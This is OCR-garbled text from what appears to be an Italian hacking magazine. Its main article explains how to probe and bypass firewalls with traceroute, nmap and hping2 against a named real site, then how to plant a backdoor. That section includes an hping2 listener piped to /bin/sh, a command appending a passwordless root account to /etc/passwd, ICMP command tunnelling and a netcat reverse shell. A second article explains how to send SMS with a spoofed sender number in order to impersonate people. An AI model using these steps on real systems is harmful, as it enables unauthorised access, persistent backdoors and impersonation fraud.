stro scopo è creare un pacchetto che arrivi 
all'hop corrispondente al firewall con un TTL 
pari a 1 e che verrà accettato da quest'ulti- 
mo che ne decrementerà il campo TTL cau- 
sando il messaggio ICMP TTL exceeded in 
transit. Prima di tutto tracciamo il nostro si- 
stema destinatario fin dove ci è permesso 
dal filtro di pacchetto: 



# traceroute -I www.xoom.it 

traceroute to xoom.it (212.66.231.5), 30 

hops max, 40 byte packets 

1 192.168.1.1 (192.168.1.1) 1.166 ms 
1.165 ms 1.097 ms 

2 xxx.x.xxx.xxx (xxx.x.xxx.xxx) 37.347 
ms 39.567 ms 40.109 ms 

3 xxx.x.xxx.xx (xxx.x.xxx.xx) 38.024 ms 
40.095 ms 39.595 ms 

4 xxx.x.xxx.xx (xxx.x.xxx.xx) 46.864 ms 
43.164 ms 41.677 ms 

5 gw-wind-mi 6-pos-inf ostrada . wind . it 
(212.245.250.49) 44.291 ms [...] 

6 c-mi2-f e2a.wind.it (212.245.36.130) 
42.704 ms 44.094 ms 45.854 ms 

7 212.245.53.30 (212.245.53.30) 55.765 
ms 57.864 ms 55.785 ms 



Ora sappiamo esattamente il valore TTL 
che dovremo utilizzare, che in questo caso 
dovrà essere pari a 8. 

Usiamo un portscanner per trovare una 
porta non filtrata sul firewall, nmap è il pro- 
gramma che fa al caso nostro: 



# nmap -sS -PO -p 80 www.xoom.it 
Starting nmap V. 2.54BETA30 ( www.in- 
secure . org/nmap/ ) 
Interesting ports on www.xoom.it 
(212.66.231.5) : 

Port State Service 
80/tcp open http 
Nmap run completed — 1 IP address (1 
host up) scanned in 1 second 



La porta 80 risulta aperta il che significa 
che il firewall lascia passare ogni richiesta di 
connessione (flag SYN attivo) verso tale por- 
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ta. Alla luce di queste considerazioni agire- 
mo come segue: 



# hping2 -p 80 -S -t 8 www.xoom.it 
HPING www.xoom.it (ethO 
212.66.231.5): S set, 40 headers 4 
data bytes 

TTL during transit from 
ip=212 . 66.224 .46 name=routerxoom. si- 
rio, it 

TTL during transit from 
ip=212 . 66 . 224 .46 name=routerxoom. si- 
rio, it 

TTL during transit from 
ip=212 . 66.224 .46 name=routerxoom. si- 
rio, it 

www.xoom.it hping statistic 
3 packets tramitted, packets re- 
ceived, 100% packet loss round-trip 
min/avg/max = 0.0/0.0/0.0 ms 



Ora sappiamo con precisione l'IP del fi- 
rewall che filtra le nostre richieste 
(212.66.224.46) e abbiamo la possibilità 
di studiarne le ACL con gli strumenti prece- 
dentemente illustrati. A questo punto incre- 
mentiamo ulteriormente il campo TTL di 
un'unità per verificare l'effettiva presenza 
dell'host destinatario dietro al sistema filtro: 



# hping2 -p 80 -S -t 9 www.xoom.it 
HPING www.xoom.it (ethO 
212.66.231.5): S set, 40 headers + 
data bytes 

len=46 ip=212. 66.231.5 flags=SA DF 
seq=0 ttl=56 id=14262 win=16384[. 
len=46 ip=212. 66.231.5 flags=SA DF 
seq=l ttl=56 id=14281 win=16384 [ . . . 
len=46 ip=212. 66.231.5 flags=SA DF 
seq=2 ttl=56 id=14295 win=16384 
www.xoom.it hping statistic 
3 packets tramitted, 3 packets recei- 
ved, 0% packet loss round-trip 
min/avg/max = 57.2/61.0/67.0 ms 



Questa volta a risponderci è diretta- 
mente il sistema destinatario, il pacchetto 
è giunto a destinazione senza che il cam- 
po TTL scadesse e la nostra richiesta di 
connessione è seguita da un pacchetto 
SYN/ACK come risposta. 

4.4 UDP scan 

L'UDP è un protocollo non connesso e 
non confermato proprio come TIR Sebbe- 
ne entrambi i protocolli vengano utilizzati 
per scopi completamente differenti, han- 
no alcune caratteristiche comuni. Proprio 
come avviene per l'IP i datagrammi UDf^ 
una volta giunti a destinazione corretta- 



mente, non forniscono alcun riscontro. 
Malgrado ciò, un eventuale errore nella 
comunicazione verrà prontamente segna- 
lato da uno specifico messaggio ICMR 

Avvalendosi del protocollo UDP, un 
utente malevolo avvalendosi è quindi in 
grado di rilevare la presenza (o l'assen- 
za) di un agente filtrante sul proprio cam- 
mino, solo in base a semplici deduzioni. 
Grazie a semplici riscontri derivanti dai 
messaggi ICMP Port Unreachable è pos- 
sibile rilevare le porte in stato closed sul 
sistema remoto, mentre le porte alla cui 
scansione non seguirà alcuna risposta 
potrebbero risultare aperte o filtrate indi- 
stintamente. 

La condizione in cui la quasi totalità 
delle porte del sistema risultino apparen- 
temente aperte può facilmente essere 
dovuta alla presenza di un firewall che 
droppa i pacchetti in ingresso verso tali 
porte UDP o che blocca l'invio di tali 
messaggi ICMP provenienti dalla rete in- 
terna verso Internet. 

Vulnerability 

Grazie alle tecniche fin ora 
descritte siamo in grado di ri- 
velare la presenza di un fire- 
wall a filtro di pacchetto, ora abbiamo 
bisogno di identificarlo con maggiore 
precisione. 

Ancora una volta il portsurfing si ri- 
vela una tecnica semplice ed efficace 
per ottenere informazioni riguardo un 
host remoto, tramite la scansione delle 
porte, infatti, siamo in grado di determi- 
nare alcuni dei firewall più comunemen- 
te utilizzati. 

5.1 Check Point FireWall-1 

Il Check Point FireWall-1 ascolta di de- 
fault sulle porte TCP 256, 257 e 258, pos- 
siamo perciò utilizzare un programma di 
scansione delle porte per identificarlo con 
estrema facilità: 



# nmap -sS -PO -p 256,257,258 local- 
host Starting nmap V. 2.54BETA30 
( www . insecure . org/nmap/ ) 
Interesting ports on localhost 
(127.0.0.1): (The 1 port scanned but 
not shown below is in state: closed) 
Port State Service 
256/tcp open rap 
257/tcp open set 
Nmap run completed — 1 IP address 
(1 host up) scanned in seconds 
(l'hostname è stato cambiato con 
localhost per correttezza) 



Una volta identificato il firewall, è pos- 
sibile sfruttare alcune delle vulnerabilità 
ad esso associate per aggirarne agevol- 
mente le protezioni e ottenere pieno ac- 
cesso ai sistemi della rete interna. A tale 
scopo vi rimando alla pagina del produt- 
tore che evidenzi< 
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ncoiare, 
,,jno il trai 
porta 53 (TCP e UDP) al fine di permette- 
re query al DNS e trasferimenti di zona. 

Questa politica permette a un utente 
remoto di venire in possesso di informa- 
zioni importanti riguardo alla struttura in- 
terna della rete, grazie alla possibilità di 
effettuare trasferimenti di zona DNS, e 
rende inoltre possibile la creazione di un 
canale di ritorno quale una sessione tel- 
net inverso. 

Lo stesso vale per la porta UDP 512, 
un attacker potrebbe forgiare dei pac- 
chetti RIP contraffatti al fine di provocare 
l'aggiornamento delle tabelle di routing 
dei router di confine per permettere l'in- 
strada mento di pacchetti verso reti non 
consentite dalle politiche di sicurezza. Vi 
sono molti altri firewall che presentano 
svariate falle nella sicurezza, il più delle 
volte il sito stesso del produttore è la mag- 
giore fonte di informazioni a riguardo. 

5.2 Syncookies 

Il sistema Syncookies dovrebbe per- 
mettere la totale scomparsa di minacce 
derivanti da attacchi SYN flood che in 
passato hanno messo in ginocchio gros- 
si colossi della rete. Syncookies entra in 






tacco e, in caso di richiesta di 
connessione (SYN flag attivo), 
manda al richiedente un pac- 
chetto SYN/ACK con un co- 
okie cifrato per chiudere l'handshake a tre 
vie il primo host deve mandare un ACK 
che comprenda il cookie precedentemen- 
te ricevuto. Questo permette di eliminare 
la coda SYN_RECEIVED e di continuare a 
gestire le richieste legittime scongiurando 
ogni tentativo di negazione del servizio. 

Di contro, è stata riscontrata una vul- 
nerabilità che può permettere di aggirare 
un firewall a filtro di pacchetto nel caso 
faccia affidamento a regole basate sullo 
stato del flag SYN dei pacchetti per ap- 
plicare il reject o il drop degli stessi. In 
particolare, un utente remoto in grado di 
raggiungere con un attacco SYN flood 
una porta del sistema non protetta dal fi- 
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COME TROVARE UN "PUNTO DI ATTACCO" IN UN FIREWALL 



rewall, al fine di causare l'intervento e l'e- 
missione dei cookie, potrà in un secondo 
tempo stabilire una connessione fornen- 
do un pacchetto ACK contenente il cookie 
corretto. 

Tale cookie può essere determinato 
con successo grazie a un attacco di forza 
bruta che permetterebbe un accesso non 
consentito al sistema protetto dal firewall. 

Backdoor 

Una volta ottenuto l'accesso 
ad uno dei sistemi interni alla 
rete, l'attacker provvedere alla 
creazione di una backdoor che dovrà 
garantire la comunicazione attraverso il 
firewall. 

Se eseguito in modalità listen, Hping2 
rimane in ascolto sull'interfaccia di rete 
specificata, in attesa di ricevere un pac- 
chetto contenente la stringa definita al 
momento dell'esecuzione (nell'esempio è 
pass), nel qual caso la stringa contenuta 
all'interno del pacchetto ricevuto corri- 
sponda, i byte successivi saranno rediret- 
ti sullo standard output. 



vittima# hping2 -I ethO -9 pass. 



Usando un pipe siamo in grado di re- 
dirigere lo standard output verso un altro 
programma, per esempio verso l'interpre- 
te dei comandi al fine di ottenere una 
shell remota sul sistema: 



vittima# hping2 -I ethO -9 pass 
/bin/sh 



Una volta posto Hping2 in ascolto sul 
sistema remoto, basterà inviare a esso 
pacchetti che contengono la stringa di ri- 
conoscimento seguita dal codice che si de- 
sidera eseguire, per far ciò basterà con- 
nettersi su una qualsiasi delle porte non fil- 
trate dal firewall e procede come segue: 



attacker# telnet vittima 21 
Trying 127.0.0.1. 
Connected to vittima. 
Escape character is 

220 ProFTPD 1.2.2rc3 Server (ProFTPD De- 
fault Installatici) passecho 
rOOt : : : : : /root : /bin/bash » 
/etc/passwd; 500 PASSECHO not understood. 
quit 

221 Goodbye. 
Connection closed by foreign host. 



In questo modo abbiamo aggiunto un 
account con uid e gid al file delle pas- 



sword senza nemmeno fare login sul si- 
stema. Qualora non avessimo alcun pun- 
to di accesso al sistema da remoto, do- 
vremo affidarci al protocollo ICMP per 
veicolare i nostri comandi in maniera del 
tutto indisturbata: 



attacker# hping2 -e 1 -1 -d 52 -E 
Vdata.txt vittima HPING vittima 
(lo 127.0.0.1): iemp mode set, 28 

headers + 61 data bytes 89 bytes 

from 127.0.0.1: icmp_seq=0 ttl=255 

id=50 rtt=0.3 ms 

localhost hping statistic 

1 packets tramitted, 1 packets re- 

ceived, 

0% packet loss round-trip 

min/avg/max = 0.3/0.3/0.3 ms 



Ecco il significato delle opzioni: 
-e è il numero di pacchetti da inviare; 
-1 indica il protocollo ICMP; 
-d indica la grandezza in byte del campo 
dati, che deve essere uguale a quella del 
file specificato tramite l'opzione -E; 

-E specifica il file che contiene il valo- 
re che assumerà il campo dati; 

Il file data.txt che si trova nella home 
directory dell'utente attacker dovrà conte- 
nere quanto segue: 



passecho rOOt : : : : : /root : /bin/bash 
» /etc/passwd; 



* * 



L'utilizzo delle opzioni -C e -K 

che permettono di specificare 

il tipo e il codice del messag- 

i gio ICMP aumenteranno le 

, I possibilità che quest'ultimo 

arrivi a destinazione senza essere drop- 
pato dal firewall. I messaggi ICMP se- 
guenti sono infatti difficilmente filtrati dai 
dispositivi di rete e saranno proprio questi 
quelli di cui si servirà un malintenzionato 
per veicolare i suoi comandi: (tratto da 
ICMP TYPE NUMBERS, M 

Type Name Reference: 



Echo Reply 

[RFC792] 

Codes 

No Code 

3 Destination Unreachable [RFC792] 
Codes 

4 Fragmentation Needed and Don't 
Fragment was Set 
4 Source Quench 
[RFC792] 
Codes 



No Code 

11 Time Exceeded [RFC792] 

Codes 

Time to Live exceeded in Trans it 



Questo tipo di backdoor permette ad 
un attacker esterno alla rete protetta di 
eseguire comandi alla cieca sul sistema 
remoto. In ogni caso è possibile perfezio- 
nare il pipe precedentemente descritto al 
fine di ottenere un canale di ritorno verso 
il proprio sistema. 

E possibile che il malintenzionato pon- 
ga un listener in ascolto su una porta lo- 
cale del proprio sistema, in modo da ac- 
cogliere una sessione inversa originata 
dal sistema posto dietro al firewall, per 
esempio: 



attacker# ne -1 -p 25 



In tal modo la sessione inversa potr? 
aver luogo: 



vittimai hping2 -I ethO -9 pass 
/bin/sh telnet attacker 25 



L'output dei comandi verrà visualizza- 
to sul sistema attacker attraverso neteat 
(ne) che ascolta sulla porta 25, notare 
che non è il sistema del malintenzionato 
a dar vita alla sessione bensì il sistema 
interno alla rete protetta, pertanto la ses- 
sione in tal modo originata verrà quasi si- 
curamente consentita dalla politica 
del firewall. 



Risorse 

RFC 793, Transmission Control 

Protocol 

Hping2-HOWTO 
man nmap 
firewalk-final.txt 1 

by[E4zy] 



RFC: Request For Comment. 
I documenti ufficiali 
che racchiudono tutte 
le informazioni sui protocolli 
e sugli standard di Internet. 



ICMP: Internet Control Message 
Protocol. Un protocollo 
per i messaggi di errore 
riguardanti la trasmissione 
dei dati su Internet. 
Per esempio il commando ping 
utilizza ICMP per verificare 
una connessione. 
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SMS CON MITTENTE FALSIFICATO 
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SMSHACWMS 

Uolete inuiare degli SMS con il numera falso, per 
proteggere il uostro anonimato? Oppure uolete 
addirittura spacciarui per un'altra persona? Si può 
fare... Grazie Tent2gsm! 



a 



uante volte vi siete chiesti 
se fosse possibile inviare 
SMS con un numero falso o 
meglio ancora con un nu- 
mero di un'altra persona? 
è possibile ed è anche 



Da ogg 
semplicissimo, 

Basta usare un semplice program- 
ma chiamato Text2gsm (facilmente 
scaricabile dal sito http://www.down- 
load.com) e il gioco è fatto. 

Vediamo come funziona: 

1 . Dopo aver installato il program- 
ma apparirà la seguente schermata: 
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Ora scrivete il messaggio nel- 
l'apposito campo e inserite il nu- 
mero del destinatario preceduto 
da 0039 avendo però cura prima 
di spuntare tutti i "temporary 
number" 

2. Ora passiamo alla parte diver- 



tente quella di inserire il numero falso: 
clicchiamo sul menù file e poi su set- 




ting e nel campo sendernumber inse- 
riamo il numero falso. Infine clicchia- 
mo su ok e poi su send e quindi il mo- 
dem invierà il nostro sms. 
Conclusione: 
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Il costo del singolo sms si aggira 
sui 50 $ cent in quanto il servizio av- 
viene tramite server stranieri. 

Mario Grasso marghfal@libero.it 



CODICI PER 

FUNZIONI 

NASCOSTE 



Ericsson T-28 

>*«*<* Accesso al menu 
Servizio, con i sotto 
menu: 

1) Info servizio (Informazioni 
SW, Info hardware, SIMlock, 
Configurazione) 

2) Impost . servizio (Contrasto) 

3) Test servizio (Display, 
Led/Illuminazione, Tastiera, 
Cicalino, Vibrazione, 
Auricolare, Microfono, Orologio. 

>*«**< Attiva menu 
Personalizza, con sottomenu rete 
(NCK) e sottorete (NSCK) . 

ALCATEL ONE TOUCH 511 

000000* Accesso al menu tecnico 
con i sotto menu: 

1) Traces (Network / RXLEV / 
BSIC / CI C2) 

2) SwOff codes 

3) Empty SwOff 

4) Charge etri 

5) Checker 
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